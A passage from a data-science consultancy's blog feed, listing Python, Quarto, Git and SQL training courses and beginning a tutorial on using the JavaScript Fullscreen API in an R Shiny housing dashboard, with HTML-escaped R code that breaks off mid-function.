&lt;h4 id="introduction-to-python"&gt;&lt;a href="https://www.jumpingrivers.com/training/course/python-introduction-visualisation-manipulation/" rel="external"&gt;Introduction to Python&lt;/a&gt;&lt;/h4&gt;
&lt;p&gt;&lt;strong&gt;Course Level: Foundation&lt;/strong&gt;&lt;/p&gt;
&lt;p&gt;&lt;em&gt;Next course date: 7th August 2023&lt;/em&gt;&lt;/p&gt;
&lt;p&gt;Python is a general-purpose programming language popular among data scientists and statisticians. In &lt;a href="https://www.jumpingrivers.com/training/course/python-introduction-visualisation-manipulation/" rel="external"&gt;this one-day introductory course&lt;/a&gt;, participants will learn to import, summarise and visualise their data. At each step, we avoid using “magic code”, and stress the importance of understanding what Python is doing.&lt;/p&gt;
&lt;h4 id="programming-with-python"&gt;&lt;a href="https://www.jumpingrivers.com/training/course/python-programming-control-flow-functions/" rel="external"&gt;Programming with Python&lt;/a&gt;&lt;/h4&gt;
&lt;p&gt;&lt;strong&gt;Course Level: Intermediate&lt;/strong&gt;&lt;/p&gt;
&lt;p&gt;&lt;em&gt;Next course date: 21st August 2023&lt;/em&gt;&lt;/p&gt;
&lt;p&gt;The benefit of using a programming language such as Python is that we can automate repetitive tasks. This course covers the fundamental techniques such as functions, for loops and conditional expressions. By the end of &lt;a href="https://www.jumpingrivers.com/training/course/python-programming-control-flow-functions/" rel="external"&gt;this course&lt;/a&gt;, you will understand what these techniques are and how they can be applied to solve real-world data wrangling tasks.&lt;/p&gt;
&lt;h4 id="data-visualisation-with-python"&gt;&lt;a href="https://www.jumpingrivers.com/training/course/python-matplotlib-seaborn-visualisation/" rel="external"&gt;Data Visualisation with Python&lt;/a&gt;&lt;/h4&gt;
&lt;p&gt;&lt;strong&gt;Course Level: Intermediate&lt;/strong&gt;&lt;/p&gt;
&lt;p&gt;&lt;em&gt;Next course date: 4th October 2023&lt;/em&gt;&lt;/p&gt;
&lt;p&gt;Python has a number of packages for the effective creation of graphics to communicate your data insights. &lt;a href="https://www.jumpingrivers.com/training/course/python-matplotlib-seaborn-visualisation/" rel="external"&gt;This course&lt;/a&gt; will examine two popular libraries for creating static 2D plots: Matplotlib and Seaborn. During the training session, we’ll cover plotting basics and customisation of figures with Matplotlib, before moving onto complex statistical visualisations with Seaborn.&lt;/p&gt;
&lt;h4 id="machine-learning-with-python"&gt;&lt;a href="https://www.jumpingrivers.com/training/course/python-machine-learning-modelling-scikit-learn/" rel="external"&gt;Machine Learning with Python&lt;/a&gt;&lt;/h4&gt;
&lt;p&gt;&lt;strong&gt;Course Level: Intermediate&lt;/strong&gt;&lt;/p&gt;
&lt;p&gt;&lt;em&gt;Next course date: 16th October 2023&lt;/em&gt;&lt;/p&gt;
&lt;p&gt;Python (along with R) has become the dominant language in machine learning and data science. &lt;a href="https://www.jumpingrivers.com/training/course/python-machine-learning-modelling-scikit-learn/" rel="external"&gt;This course&lt;/a&gt; will equip you with the knowledge and tools to undertake a variety of tasks in a standard machine learning pipeline. We stress the importance of data preparation, both in terms of data standardisation and feature selection, before tackling model building.&lt;/p&gt;
&lt;h3 id="other-courses"&gt;Other courses&lt;/h3&gt;
&lt;p&gt;We are also offering several language-agnostic courses spanning automated reporting with Quarto, version control with Git, and relational databases with SQL.&lt;/p&gt;
&lt;h4 id="reporting-with-quarto"&gt;&lt;a href="https://www.jumpingrivers.com/training/course/reporting-with-quarto/" rel="external"&gt;Reporting with Quarto&lt;/a&gt;&lt;/h4&gt;
&lt;p&gt;&lt;strong&gt;Course Level: Intermediate&lt;/strong&gt;&lt;/p&gt;
&lt;p&gt;&lt;em&gt;Next course date: 14th August 2023&lt;/em&gt;&lt;/p&gt;
&lt;p&gt;Do you create interactive documents that always need to be updated when the data changes? Then &lt;a href="https://www.jumpingrivers.com/training/course/reporting-with-quarto/" rel="external"&gt;this course&lt;/a&gt; is for you. In this course you will learn how to use Quarto to create high quality, dynamic, fully reproducible documents. Quarto is a multi-language open source publishing tool that allows for the creation of dynamic content with Python, R, Julia and Observable.&lt;/p&gt;
&lt;h4 id="git-for-me"&gt;&lt;a href="https://www.jumpingrivers.com/training/course/git-for-me/" rel="external"&gt;Git for Me&lt;/a&gt;&lt;/h4&gt;
&lt;p&gt;&lt;strong&gt;Course Level: Foundation&lt;/strong&gt;&lt;/p&gt;
&lt;p&gt;&lt;em&gt;Next course date: 6th September 2023&lt;/em&gt;&lt;/p&gt;
&lt;p&gt;When working on data analysis projects version control is essential, for tracking project progress and assisting project collaboration. During &lt;a href="https://www.jumpingrivers.com/training/course/git-for-me/" rel="external"&gt;this course&lt;/a&gt; we will show you multiple ways to integrate version control into your project with git. You will gain an understanding of how to use online code sharing websites such as GitHub / GitLab, along with the best practices while doing so.&lt;/p&gt;
&lt;h4 id="introduction-to-sql"&gt;&lt;a href="https://www.jumpingrivers.com/training/course/sql-introduction-postgres-aws-database/" rel="external"&gt;Introduction to SQL&lt;/a&gt;&lt;/h4&gt;
&lt;p&gt;&lt;strong&gt;Course Level: Foundation&lt;/strong&gt;&lt;/p&gt;
&lt;p&gt;&lt;em&gt;Next course date: 20th September 2023&lt;/em&gt;&lt;/p&gt;
&lt;p&gt;The Structured Query Language (SQL) defines a standard for communicating with a relational database. In &lt;a href="https://www.jumpingrivers.com/training/course/sql-introduction-postgres-aws-database/" rel="external"&gt;this one-day introductory course&lt;/a&gt;, participants will learn the basic SQL syntax for data extraction, filtering and insertion. We will start by querying a local database before connecting to a remote database held on an AWS server. Here, we will stress important considerations when working with shared databases in the cloud.&lt;/p&gt;
&lt;p&gt;
For updates and revisions to this article, see the &lt;a href = "https://www.jumpingrivers.com/blog/july-training-update-python-r-quarto-git-sql/"&gt;original post&lt;/a&gt;
&lt;/p&gt;</description></item><item><title>Fullscreen Ahead for Shiny Applications</title><link>https://www.jumpingrivers.com/blog/fullscreen-r-shiny-javascript-api/</link><pubDate>Thu, 08 Jun 2023 23:59:00 +0000</pubDate><guid>https://www.jumpingrivers.com/blog/fullscreen-r-shiny-javascript-api/</guid><description>
&lt;p&gt;
&lt;a href = "https://www.jumpingrivers.com/blog/fullscreen-r-shiny-javascript-api/"&gt;
&lt;img src="https://www.jumpingrivers.com/blog/fullscreen-r-shiny-javascript-api/featured.jpg " width="400" style="width:400px" class="image-center" style="display: block; margin: auto;" /&gt;
&lt;/a&gt;
&lt;/p&gt;
&lt;style&gt;
details {
margin-top: 0.5em;
}
summary {
cursor: pointer;
}
details .highlight {
margin-top: 0.5em;
}
details pre {
margin-bottom: 0.2em;
}
aside {
background-color: #eeeeee;
padding: 1em;
}
.blog-content aside h3 {
color: black;
font-size: 24px;
}
&lt;/style&gt;
&lt;p&gt;Browsers have been implementing variations on a JavaScript fullscreen API for over a decade. Unfortunately, for much of that time the APIs varied across browsers. This made actually using it in production somewhat cumbersome.&lt;/p&gt;
&lt;p&gt;Finally, with the release of Safari 16.4 in March of this year, the &lt;a href="https://caniuse.com/fullscreen" rel="external"&gt;latest versions&lt;/a&gt; of all major desktop browsers now support a single, standardized interface. Legacy versions of Safari for desktop are still in use and there&amp;rsquo;s still no support at all for the Fullscreen API on iPhones; so while you can cover most users with the standardized API, it should still be for &lt;a href="https://developer.mozilla.org/en-US/docs/Glossary/Progressive_Enhancement" rel="external"&gt;progressive enhancement&lt;/a&gt; and not as a fundamental requirement for operation of an application.&lt;/p&gt;
&lt;p&gt;In this post I&amp;rsquo;m going to show how we can enhance a toy Shiny application with fullscreen behaviour using only a few lines of JavaScript. Unfortunately, I did have issues using the fullscreen API with the browser that comes with RStudio &amp;mdash; while at least some of the methods exist, calling them led to errors being thrown. Because of this, we will launch that app we build straight into the system&amp;rsquo;s default browser.&lt;/p&gt;
&lt;p&gt;You can find all the code on our &lt;a href="https://github.com/jumpingrivers/blog" rel="external"&gt;Github blog repository&lt;/a&gt; under &lt;a href="https://github.com/jumpingrivers/blog/tree/main/blogs/fullscreen-shiny" rel="external"&gt;&amp;ldquo;fullscreen-shiny&amp;rdquo;&lt;/a&gt;.&lt;/p&gt;
&lt;aside class="advert"&gt;
&lt;p&gt;
Do you require help building a Shiny app? Would you like someone to take over the maintenance burden?
If so, check out
our
&lt;a href="https://www.jumpingrivers.com/consultancy/shiny-dash-flask-dashboard-consultancy/?utm_source=blog&amp;amp;utm_medium=banner&amp;amp;utm_campaign=2023-fullscreen-r-shiny-javascript-api"&gt;Shiny and Dash&lt;/a&gt;
services.
&lt;/p&gt;
&lt;/aside&gt;
&lt;h2 id="the-shiny-app"&gt;The Shiny App&lt;/h2&gt;
&lt;p&gt;For the toy Shiny application we&amp;rsquo;ll use the &lt;a href="https://ggplot2.tidyverse.org/reference/txhousing.html" rel="external"&gt;&lt;code&gt;txhousing&lt;/code&gt; dataset&lt;/a&gt; from {ggplot2}. The full R code is provided below, but the &lt;code&gt;ui&lt;/code&gt; function is the most relevant bit:&lt;/p&gt;
&lt;details&gt;&lt;summary&gt;&lt;code&gt;library&lt;/code&gt; imports&lt;/summary&gt;
&lt;div class="highlight"&gt;&lt;pre tabindex="0" style="color:#e6edf3;background-color:#0d1117;-moz-tab-size:4;-o-tab-size:4;tab-size:4;"&gt;&lt;code class="language-r" data-lang="r"&gt;&lt;span style="display:flex;"&gt;&lt;span&gt;&lt;span style="color:#8b949e;font-style:italic"&gt;# ./app.R&lt;/span&gt;
&lt;/span&gt;&lt;/span&gt;&lt;span style="display:flex;"&gt;&lt;span&gt;&lt;span style="color:#d2a8ff;font-weight:bold"&gt;library&lt;/span&gt;(&lt;span style="color:#a5d6ff"&gt;&amp;#34;shiny&amp;#34;&lt;/span&gt;)
&lt;/span&gt;&lt;/span&gt;&lt;span style="display:flex;"&gt;&lt;span&gt;&lt;span style="color:#d2a8ff;font-weight:bold"&gt;library&lt;/span&gt;(&lt;span style="color:#a5d6ff"&gt;&amp;#34;tidyverse&amp;#34;&lt;/span&gt;)
&lt;/span&gt;&lt;/span&gt;&lt;span style="display:flex;"&gt;&lt;span&gt;&lt;span style="color:#d2a8ff;font-weight:bold"&gt;library&lt;/span&gt;(&lt;span style="color:#a5d6ff"&gt;&amp;#34;glue&amp;#34;&lt;/span&gt;)
&lt;/span&gt;&lt;/span&gt;&lt;span style="display:flex;"&gt;&lt;span&gt;&lt;span style="color:#8b949e;font-style:italic"&gt;# Launch in system&amp;#39;s default browser&lt;/span&gt;
&lt;/span&gt;&lt;/span&gt;&lt;span style="display:flex;"&gt;&lt;span&gt;&lt;span style="color:#d2a8ff;font-weight:bold"&gt;options&lt;/span&gt;(shiny.launch.browser &lt;span style="color:#ff7b72;font-weight:bold"&gt;=&lt;/span&gt; .rs.invokeShinyWindowExternal)
&lt;/span&gt;&lt;/span&gt;&lt;/code&gt;&lt;/pre&gt;&lt;/div&gt;&lt;/details&gt;
&lt;details open&gt;&lt;summary&gt;&lt;code&gt;ui&lt;/code&gt; function&lt;/summary&gt;
&lt;div class="highlight"&gt;&lt;pre tabindex="0" style="color:#e6edf3;background-color:#0d1117;-moz-tab-size:4;-o-tab-size:4;tab-size:4;"&gt;&lt;code class="language-r" data-lang="r"&gt;&lt;span style="display:flex;"&gt;&lt;span&gt;ui &lt;span style="color:#ff7b72;font-weight:bold"&gt;=&lt;/span&gt; &lt;span style="color:#d2a8ff;font-weight:bold"&gt;fluidPage&lt;/span&gt;(
&lt;/span&gt;&lt;/span&gt;&lt;span style="display:flex;"&gt;&lt;span&gt; tags&lt;span style="color:#ff7b72;font-weight:bold"&gt;$&lt;/span&gt;&lt;span style="color:#d2a8ff;font-weight:bold"&gt;head&lt;/span&gt;(
&lt;/span&gt;&lt;/span&gt;&lt;span style="display:flex;"&gt;&lt;span&gt; tags&lt;span style="color:#ff7b72;font-weight:bold"&gt;$&lt;/span&gt;&lt;span style="color:#d2a8ff;font-weight:bold"&gt;link&lt;/span&gt;(rel &lt;span style="color:#ff7b72;font-weight:bold"&gt;=&lt;/span&gt; &lt;span style="color:#a5d6ff"&gt;&amp;#34;stylesheet&amp;#34;&lt;/span&gt;, href &lt;span style="color:#ff7b72;font-weight:bold"&gt;=&lt;/span&gt; &lt;span style="color:#a5d6ff"&gt;&amp;#34;style.css&amp;#34;&lt;/span&gt;),
&lt;/span&gt;&lt;/span&gt;&lt;span style="display:flex;"&gt;&lt;span&gt; tags&lt;span style="color:#ff7b72;font-weight:bold"&gt;$&lt;/span&gt;&lt;span style="color:#d2a8ff;font-weight:bold"&gt;script&lt;/span&gt;(src &lt;span style="color:#ff7b72;font-weight:bold"&gt;=&lt;/span&gt; &lt;span style="color:#a5d6ff"&gt;&amp;#34;fullscreen.js&amp;#34;&lt;/span&gt;)
&lt;/span&gt;&lt;/span&gt;&lt;span style="display:flex;"&gt;&lt;span&gt; ),
&lt;/span&gt;&lt;/span&gt;&lt;span style="display:flex;"&gt;&lt;span&gt; &lt;span style="color:#d2a8ff;font-weight:bold"&gt;titlePanel&lt;/span&gt;(title &lt;span style="color:#ff7b72;font-weight:bold"&gt;=&lt;/span&gt; &lt;span style="color:#a5d6ff"&gt;&amp;#34;Texas housing dashboard&amp;#34;&lt;/span&gt;),
&lt;/span&gt;&lt;/span&gt;&lt;span style="display:flex;"&gt;&lt;span&gt; &lt;span style="color:#d2a8ff;font-weight:bold"&gt;sidebarPanel&lt;/span&gt;(&lt;span style="color:#d2a8ff;font-weight:bold"&gt;selectInput&lt;/span&gt;(
&lt;/span&gt;&lt;/span&gt;&lt;span style="display:flex;"&gt;&lt;span&gt; &lt;span style="color:#a5d6ff"&gt;&amp;#34;city&amp;#34;&lt;/span&gt;, &lt;span style="color:#a5d6ff"&gt;&amp;#34;City&amp;#34;&lt;/span&gt;, &lt;span style="color:#d2a8ff;font-weight:bold"&gt;unique&lt;/span&gt;(txhousing&lt;span style="color:#ff7b72;font-weight:bold"&gt;$&lt;/span&gt;city), selectize &lt;span style="color:#ff7b72;font-weight:bold"&gt;=&lt;/span&gt; &lt;span style="color:#79c0ff"&gt;FALSE&lt;/span&gt;
&lt;/span&gt;&lt;/span&gt;&lt;span style="display:flex;"&gt;&lt;span&gt; )),
&lt;/span&gt;&lt;/span&gt;&lt;span style="display:flex;"&gt;&lt;span&gt; &lt;span style="color:#d2a8ff;font-weight:bold"&gt;mainPanel&lt;/span&gt;(
&lt;/span&gt;&lt;/span&gt;&lt;span style="display:flex;"&gt;&lt;span&gt; tags&lt;span style="color:#ff7b72;font-weight:bold"&gt;$&lt;/span&gt;&lt;span style="color:#d2a8ff;font-weight:bold"&gt;div&lt;/span&gt;(
&lt;/span&gt;&lt;/span&gt;&lt;span style="display:flex;"&gt;&lt;span&gt; &lt;span style="color:#d2a8ff;font-weight:bold"&gt;plotOutput&lt;/span&gt;(&lt;span style="color:#a5d6ff"&gt;&amp;#34;salesPlot&amp;#34;&lt;/span&gt;, height &lt;span style="color:#ff7b72;font-weight:bold"&gt;=&lt;/span&gt; &lt;span style="color:#a5d6ff"&gt;&amp;#34;100%&amp;#34;&lt;/span&gt;),
&lt;/span&gt;&lt;/span&gt;&lt;span style="display:flex;"&gt;&lt;span&gt; &lt;span style="color:#a5d6ff"&gt;&amp;#34;class&amp;#34;&lt;/span&gt; &lt;span style="color:#ff7b72;font-weight:bold"&gt;=&lt;/span&gt; &lt;span style="color:#a5d6ff"&gt;&amp;#34;plot-container&amp;#34;&lt;/span&gt;,
&lt;/span&gt;&lt;/span&gt;&lt;span style="display:flex;"&gt;&lt;span&gt; &lt;span style="color:#a5d6ff"&gt;&amp;#34;tabindex&amp;#34;&lt;/span&gt; &lt;span style="color:#ff7b72;font-weight:bold"&gt;=&lt;/span&gt; &lt;span style="color:#a5d6ff"&gt;&amp;#34;0&amp;#34;&lt;/span&gt;
&lt;/span&gt;&lt;/span&gt;&lt;span style="display:flex;"&gt;&lt;span&gt; ),
&lt;/span&gt;&lt;/span&gt;&lt;span style="display:flex;"&gt;&lt;span&gt; tags&lt;span style="color:#ff7b72;font-weight:bold"&gt;$&lt;/span&gt;&lt;span style="color:#d2a8ff;font-weight:bold"&gt;div&lt;/span&gt;(
&lt;/span&gt;&lt;/span&gt;&lt;span style="display:flex;"&gt;&lt;span&gt; &lt;span style="color:#d2a8ff;font-weight:bold"&gt;plotOutput&lt;/span&gt;(&lt;span style="color:#a5d6ff"&gt;&amp;#34;volumePlot&amp;#34;&lt;/span&gt;, height &lt;span style="color:#ff7b72;font-weight:bold"&gt;=&lt;/span&gt; &lt;span style="color:#a5d6ff"&gt;&amp;#34;100%&amp;#34;&lt;/span&gt;),
&lt;/span&gt;&lt;/span&gt;&lt;span style="display:flex;"&gt;&lt;span&gt; &lt;span style="color:#a5d6ff"&gt;&amp;#34;class&amp;#34;&lt;/span&gt; &lt;span style="color:#ff7b72;font-weight:bold"&gt;=&lt;/span&gt; &lt;span style="color:#a5d6ff"&gt;&amp;#34;plot-container&amp;#34;&lt;/span&gt;,
&lt;/span&gt;&lt;/span&gt;&lt;span style="display:flex;"&gt;&lt;span&gt; &lt;span style="color:#a5d6ff"&gt;&amp;#34;tabindex&amp;#34;&lt;/span&gt; &lt;span style="color:#ff7b72;font-weight:bold"&gt;=&lt;/span&gt; &lt;span style="color:#a5d6ff"&gt;&amp;#34;0&amp;#34;&lt;/span&gt;
&lt;/span&gt;&lt;/span&gt;&lt;span style="display:flex;"&gt;&lt;span&gt; ),
&lt;/span&gt;&lt;/span&gt;&lt;span style="display:flex;"&gt;&lt;span&gt; tags&lt;span style="color:#ff7b72;font-weight:bold"&gt;$&lt;/span&gt;&lt;span style="color:#d2a8ff;font-weight:bold"&gt;div&lt;/span&gt;(
&lt;/span&gt;&lt;/span&gt;&lt;span style="display:flex;"&gt;&lt;span&gt; &lt;span style="color:#d2a8ff;font-weight:bold"&gt;plotOutput&lt;/span&gt;(&lt;span style="color:#a5d6ff"&gt;&amp;#34;medianPlot&amp;#34;&lt;/span&gt;, height &lt;span style="color:#ff7b72;font-weight:bold"&gt;=&lt;/span&gt; &lt;span style="color:#a5d6ff"&gt;&amp;#34;100%&amp;#34;&lt;/span&gt;),
&lt;/span&gt;&lt;/span&gt;&lt;span style="display:flex;"&gt;&lt;span&gt; &lt;span style="color:#a5d6ff"&gt;&amp;#34;class&amp;#34;&lt;/span&gt; &lt;span style="color:#ff7b72;font-weight:bold"&gt;=&lt;/span&gt; &lt;span style="color:#a5d6ff"&gt;&amp;#34;plot-container&amp;#34;&lt;/span&gt;,
&lt;/span&gt;&lt;/span&gt;&lt;span style="display:flex;"&gt;&lt;span&gt; &lt;span style="color:#a5d6ff"&gt;&amp;#34;tabindex&amp;#34;&lt;/span&gt; &lt;span style="color:#ff7b72;font-weight:bold"&gt;=&lt;/span&gt; &lt;span style="color:#a5d6ff"&gt;&amp;#34;0&amp;#34;&lt;/span&gt;
&lt;/span&gt;&lt;/span&gt;&lt;span style="display:flex;"&gt;&lt;span&gt; ),
&lt;/span&gt;&lt;/span&gt;&lt;span style="display:flex;"&gt;&lt;span&gt; tags&lt;span style="color:#ff7b72;font-weight:bold"&gt;$&lt;/span&gt;&lt;span style="color:#d2a8ff;font-weight:bold"&gt;div&lt;/span&gt;(
&lt;/span&gt;&lt;/span&gt;&lt;span style="display:flex;"&gt;&lt;span&gt; &lt;span style="color:#d2a8ff;font-weight:bold"&gt;plotOutput&lt;/span&gt;(&lt;span style="color:#a5d6ff"&gt;&amp;#34;listingsPlot&amp;#34;&lt;/span&gt;, height &lt;span style="color:#ff7b72;font-weight:bold"&gt;=&lt;/span&gt; &lt;span style="color:#a5d6ff"&gt;&amp;#34;100%&amp;#34;&lt;/span&gt;),
&lt;/span&gt;&lt;/span&gt;&lt;span style="display:flex;"&gt;&lt;span&gt; &lt;span style="color:#a5d6ff"&gt;&amp;#34;class&amp;#34;&lt;/span&gt; &lt;span style="color:#ff7b72;font-weight:bold"&gt;=&lt;/span&gt; &lt;span style="color:#a5d6ff"&gt;&amp;#34;plot-container&amp;#34;&lt;/span&gt;,
&lt;/span&gt;&lt;/span&gt;&lt;span style="display:flex;"&gt;&lt;span&gt; &lt;span style="color:#a5d6ff"&gt;&amp;#34;tabindex&amp;#34;&lt;/span&gt; &lt;span style="color:#ff7b72;font-weight:bold"&gt;=&lt;/span&gt; &lt;span style="color:#a5d6ff"&gt;&amp;#34;0&amp;#34;&lt;/span&gt;
&lt;/span&gt;&lt;/span&gt;&lt;span style="display:flex;"&gt;&lt;span&gt; )
&lt;/span&gt;&lt;/span&gt;&lt;span style="display:flex;"&gt;&lt;span&gt; )
&lt;/span&gt;&lt;/span&gt;&lt;span style="display:flex;"&gt;&lt;span&gt;)
&lt;/span&gt;&lt;/span&gt;&lt;/code&gt;&lt;/pre&gt;&lt;/div&gt;&lt;/details&gt;
&lt;details&gt;&lt;summary&gt;&lt;code&gt;server&lt;/code&gt; function&lt;/summary&gt;
&lt;div class="highlight"&gt;&lt;pre tabindex="0" style="color:#e6edf3;background-color:#0d1117;-moz-tab-size:4;-o-tab-size:4;tab-size:4;"&gt;&lt;code class="language-r" data-lang="r"&gt;&lt;span style="display:flex;"&gt;&lt;span&gt;server &lt;span style="color:#ff7b72;font-weight:bold"&gt;=&lt;/span&gt; &lt;span style="color:#ff7b72"&gt;function&lt;/span&gt;(input, output, session) {
&lt;/span&gt;&lt;/span&gt;&lt;span style="display:flex;"&gt;&lt;span&gt; baseData &lt;span style="color:#ff7b72;font-weight:bold"&gt;=&lt;/span&gt; txhousing &lt;span style="color:#ff7b72;font-weight:bold"&gt;%&amp;gt;%&lt;/span&gt;
&lt;/span&gt;&lt;/span&gt;&lt;span style="display:flex;"&gt;&lt;span&gt; &lt;span style="color:#d2a8ff;font-weight:bold"&gt;mutate&lt;/span&gt;(
&lt;/span&gt;&lt;/span&gt;&lt;span style="display:flex;"&gt;&lt;span&gt; volume &lt;span style="color:#ff7b72;font-weight:bold"&gt;=&lt;/span&gt; volume &lt;span style="color:#ff7b72;font-weight:bold"&gt;/&lt;/span&gt; &lt;span style="color:#a5d6ff"&gt;1000000&lt;/span&gt;,
&lt;/span&gt;&lt;/span&gt;&lt;span style="display:flex;"&gt;&lt;span&gt; median &lt;span style="color:#ff7b72;font-weight:bold"&gt;=&lt;/span&gt; median &lt;span style="color:#ff7b72;font-weight:bold"&gt;/&lt;/span&gt; &lt;span style="color:#a5d6ff"&gt;1000&lt;/span&gt;,
&lt;/span&gt;&lt;/span&gt;&lt;span style="display:flex;"&gt;&lt;span&gt; date &lt;span style="color:#ff7b72;font-weight:bold"&gt;=&lt;/span&gt; &lt;span style="color:#d2a8ff;font-weight:bold"&gt;as.Date&lt;/span&gt;(&lt;span style="color:#d2a8ff;font-weight:bold"&gt;glue&lt;/span&gt;(&lt;span style="color:#a5d6ff"&gt;&amp;#34;{year}-{month}-01&amp;#34;&lt;/span&gt;), &lt;span style="color:#a5d6ff"&gt;&amp;#34;%Y-%m-%d&amp;#34;&lt;/span&gt;)
&lt;/span&gt;&lt;/span&gt;&lt;span style="display:flex;"&gt;&lt;span&gt; )
&lt;/span&gt;&lt;/span&gt;&lt;span style="display:flex;"&gt;&lt;span&gt;
&lt;/span&gt;&lt;/span&gt;&lt;span style="display:flex;"&gt;&lt;span&gt; data &lt;span style="color:#ff7b72;font-weight:bold"&gt;=&lt;/span&gt; &lt;span style="color:#d2a8ff;font-weight:bold"&gt;reactive&lt;/span&gt;({
&lt;/span&gt;&lt;/span&gt;&lt;span style="display:flex;"&gt;&lt;span&gt; baseData &lt;span style="color:#ff7b72;font-weight:bold"&gt;%&amp;gt;%&lt;/span&gt;
&lt;/span&gt;&lt;/span&gt;&lt;span style="display:flex;"&gt;&lt;span&gt; &lt;span style="color:#d2a8ff;font-weight:bold"&gt;filter&lt;/span&gt;(city &lt;span style="color:#ff7b72;font-weight:bold"&gt;==&lt;/span&gt; input&lt;span style="color:#ff7b72;font-weight:bold"&gt;$&lt;/span&gt;city)
&lt;/span&gt;&lt;/span&gt;&lt;span style="display:flex;"&gt;&lt;span&gt; })
&lt;/span&gt;&lt;/span&gt;&lt;span style="display:flex;"&gt;&lt;span&gt;
&lt;/span&gt;&lt;/span&gt;&lt;span style="display:flex;"&gt;&lt;span&gt; dates &lt;span style="color:#ff7b72;font-weight:bold"&gt;=&lt;/span&gt; &lt;span style="color:#d2a8ff;font-weight:bold"&gt;as.Date&lt;/span&gt;(&lt;span style="color:#d2a8ff;font-weight:bold"&gt;c&lt;/span&gt;(&lt;span style="color:#a5d6ff"&gt;&amp;#34;2000-01-01&amp;#34;&lt;/span&gt;, &lt;span style="color:#a5d6ff"&gt;&amp;#34;2015-07-01&amp;#34;&lt;/span&gt;), &lt;span style="color:#a5d6ff"&gt;&amp;#34;%Y-%m-%d&amp;#34;&lt;/span&gt;)
&lt;/span&gt;&lt;/span&gt;&lt;span style="display:flex;"&gt;&lt;span&gt;
&lt;/span&gt;&lt;/span&gt;&lt;span style="display:flex;"&gt;&lt;span&gt; formatLabels &lt;span style="color:#ff7b72;font-weight:bold"&gt;=&lt;/span&gt; &lt;span style="color:#ff7b72"&gt;function&lt;/span&gt;(label) {
&lt;/span&gt;&lt;/span&gt;&lt;span style="display:flex;"&gt;&lt;span&gt; &lt;span style="color:#d2a8ff;font-weight:bold"&gt;str_pad&lt;/span&gt;(label, &lt;span style="color:#a5d6ff"&gt;6&lt;/span&gt;, pad &lt;span style="color:#ff7b72;font-weight:bold"&gt;=&lt;/span&gt; &lt;span style="color:#a5d6ff"&gt;&amp;#34; &amp;#34;&lt;/span&gt;)
&lt;/span&gt;&lt;/span&gt;&lt;span style="display:flex;"&gt;&lt;span&gt; }
&lt;/span&gt;&lt;/span&gt;&lt;span style="display:flex;"&gt;&lt;span&gt;
&lt;/span&gt;&lt;/span&gt;&lt;span style="display:flex;"&gt;&lt;span&gt; createPlot &lt;span style="color:#ff7b72;font-weight:bold"&gt;=&lt;/span&gt; &lt;span style="color:#ff7b72"&gt;function&lt;/span&gt;(data, yProp, yTitle) {
&lt;/span&gt;&lt;/span&gt;&lt;span style="display:flex;"&gt;&lt;span&gt; &lt;span style="color:#d2a8ff;font-weight:bold"&gt;ggplot&lt;/span&gt;(data) &lt;span style="color:#ff7b72;font-weight:bold"&gt;+&lt;/span&gt;
&lt;/span&gt;&lt;/span&gt;&lt;span style="display:flex;"&gt;&lt;span&gt; &lt;span style="color:#d2a8ff;font-weight:bold"&gt;geom_line&lt;/span&gt;(&lt;span style="color:#d2a8ff;font-weight:bold"&gt;aes&lt;/span&gt;(x &lt;span style="color:#ff7b72;font-weight:bold"&gt;=&lt;/span&gt; date, y &lt;span style="color:#ff7b72;font-weight:bold"&gt;=&lt;/span&gt; .data[[yProp]])) &lt;span style="color:#ff7b72;font-weight:bold"&gt;+&lt;/span&gt;
&lt;/span&gt;&lt;/span&gt;&lt;span style="display:flex;"&gt;&lt;span&gt; &lt;span style="color:#d2a8ff;font-weight:bold"&gt;labs&lt;/span&gt;(x &lt;span style="color:#ff7b72;font-weight:bold"&gt;=&lt;/span&gt; &lt;span style="color:#a5d6ff"&gt;&amp;#34;Date&amp;#34;&lt;/span&gt;,
&lt;/span&gt;&lt;/span&gt;&lt;span style="display:flex;"&gt;&lt;span&gt; y &lt;span style="color:#ff7b72;font-weight:bold"&gt;=&lt;/span&gt; yTitle) &lt;span style="color:#ff7b72;font-weight:bold"&gt;+&lt;/span&gt;
&lt;/span&gt;&lt;/span&gt;&lt;span style="display:flex;"&gt;&lt;span&gt; &lt;span style="color:#d2a8ff;font-weight:bold"&gt;scale_x_date&lt;/span&gt;(limits &lt;span style="color:#ff7b72;font-weight:bold"&gt;=&lt;/span&gt; dates,
&lt;/span&gt;&lt;/span&gt;&lt;span style="display:flex;"&gt;&lt;span&gt; expand &lt;span style="color:#ff7b72;font-weight:bold"&gt;=&lt;/span&gt; &lt;span style="color:#d2a8ff;font-weight:bold"&gt;expansion&lt;/span&gt;(mult &lt;span style="color:#ff7b72;font-weight:bold"&gt;=&lt;/span&gt; &lt;span style="color:#d2a8ff;font-weight:bold"&gt;c&lt;/span&gt;(&lt;span style="color:#a5d6ff"&gt;0.025&lt;/span&gt;, &lt;span style="color:#a5d6ff"&gt;0&lt;/span&gt;))) &lt;span style="color:#ff7b72;font-weight:bold"&gt;+&lt;/span&gt;
&lt;/span&gt;&lt;/span&gt;&lt;span style="display:flex;"&gt;&lt;span&gt; &lt;span style="color:#d2a8ff;font-weight:bold"&gt;scale_y_continuous&lt;/span&gt;(
&lt;/span&gt;&lt;/span&gt;&lt;span style="display:flex;"&gt;&lt;span&gt; labels &lt;span style="color:#ff7b72;font-weight:bold"&gt;=&lt;/span&gt; formatLabels,
&lt;/span&gt;&lt;/span&gt;&lt;span style="display:flex;"&gt;&lt;span&gt; limits &lt;span style="color:#ff7b72;font-weight:bold"&gt;=&lt;/span&gt; &lt;span style="color:#d2a8ff;font-weight:bold"&gt;c&lt;/span&gt;(&lt;span style="color:#a5d6ff"&gt;0&lt;/span&gt;, &lt;span style="color:#79c0ff"&gt;NA&lt;/span&gt;),
&lt;/span&gt;&lt;/span&gt;&lt;span style="display:flex;"&gt;&lt;span&gt; expand &lt;span style="color:#ff7b72;font-weight:bold"&gt;=&lt;/span&gt; &lt;span style="color:#d2a8ff;font-weight:bold"&gt;expansion&lt;/span&gt;(mult &lt;span style="color:#ff7b72;font-weight:bold"&gt;=&lt;/span&gt; &lt;span style="color:#d2a8ff;font-weight:bold"&gt;c&lt;/span&gt;(&lt;span style="color:#a5d6ff"&gt;0&lt;/span&gt;, &lt;span style="color:#a5d6ff"&gt;0.025&lt;/span&gt;))
&lt;/span&gt;&lt;/span&gt;&lt;span style="display:flex;"&gt;&lt;span&gt; ) &lt;span style="color:#ff7b72;font-weight:bold"&gt;+&lt;/span&gt;
